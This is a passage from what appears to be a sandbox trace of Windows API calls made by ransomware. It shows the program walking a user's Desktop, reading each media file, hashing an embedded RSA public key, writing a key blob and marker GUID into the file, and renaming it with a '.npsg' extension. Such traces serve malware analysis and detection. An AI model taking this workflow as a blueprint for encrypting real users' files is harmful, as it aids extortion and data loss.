dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000f8 [0236.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000c8 [0236.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000b0 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400110 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000b0 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000b0 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400080 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400110 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400080 | out: hHeap=0x620000) returned 1 [0236.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000b0 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400098 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.267] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14147, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.267] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.267] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.267] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.268] CloseHandle (hObject=0x644) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0236.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.269] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IZMpnRM1tsO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\izmpnrm1tso.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IZMpnRM1tsO.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\izmpnrm1tso.wav.npsg")) returned 1 [0236.271] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef25eb50, ftCreationTime.dwHighDateTime=0x1d5b67b, ftLastAccessTime.dwLowDateTime=0x4278b930, ftLastAccessTime.dwHighDateTime=0x1d5c19a, ftLastWriteTime.dwLowDateTime=0x4278b930, ftLastWriteTime.dwHighDateTime=0x1d5c19a, nFileSizeHigh=0x0, nFileSizeLow=0x124c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L7tAK3a49Ko.bmp", cAlternateFileName="L7TAK3~1.BMP")) returned 1 [0236.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.271] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L7tAK3a49Ko.bmp") returned=".bmp" [0236.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L7tAK3a49Ko.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l7tak3a49ko.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.272] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=4684) returned 1 [0236.272] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.275] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1226, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.275] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.276] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x124c, lpOverlapped=0x0) returned 1 [0236.276] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.276] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.276] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.276] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.277] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.277] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.277] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.277] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.278] GetLastError () returned 0x0 [0236.278] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.278] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.278] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.278] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.278] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.278] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.278] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x124c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.279] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.279] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.279] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.279] CloseHandle (hObject=0x644) returned 1 [0236.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0236.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.280] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L7tAK3a49Ko.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l7tak3a49ko.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L7tAK3a49Ko.bmp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l7tak3a49ko.bmp.npsg")) returned 1 [0236.282] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3b5420, ftCreationTime.dwHighDateTime=0x1d5b776, ftLastAccessTime.dwLowDateTime=0x299f700, ftLastAccessTime.dwHighDateTime=0x1d5bc83, ftLastWriteTime.dwLowDateTime=0x299f700, ftLastWriteTime.dwHighDateTime=0x1d5bc83, nFileSizeHigh=0x0, nFileSizeLow=0xb06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mQvFbEibR0KeT2 Eo.m4a", cAlternateFileName="MQVFBE~1.M4A")) returned 1 [0236.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.282] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mQvFbEibR0KeT2 Eo.m4a") returned=".m4a" [0236.282] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mQvFbEibR0KeT2 Eo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mqvfbeibr0ket2 eo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.282] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=2822) returned 1 [0236.282] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.285] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xae0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.285] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.287] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.287] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xb06, lpOverlapped=0x0) returned 1 [0236.287] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.287] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.288] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.288] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.289] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.289] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.289] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.289] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.289] GetLastError () returned 0x0 [0236.289] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.289] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.289] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.289] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.289] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb10) returned 0x3b8f7a8 [0236.289] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95080 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400068 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b950c8 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400080 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000b0 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400110 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000c8 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.290] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b7fcd0 [0236.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000b0 | out: hHeap=0x620000) returned 1 [0236.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400110 | out: hHeap=0x620000) returned 1 [0236.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fcd0 | out: hHeap=0x620000) returned 1 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400110 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000c8 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34000b0 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000b0 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400110 | out: hHeap=0x620000) returned 1 [0236.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 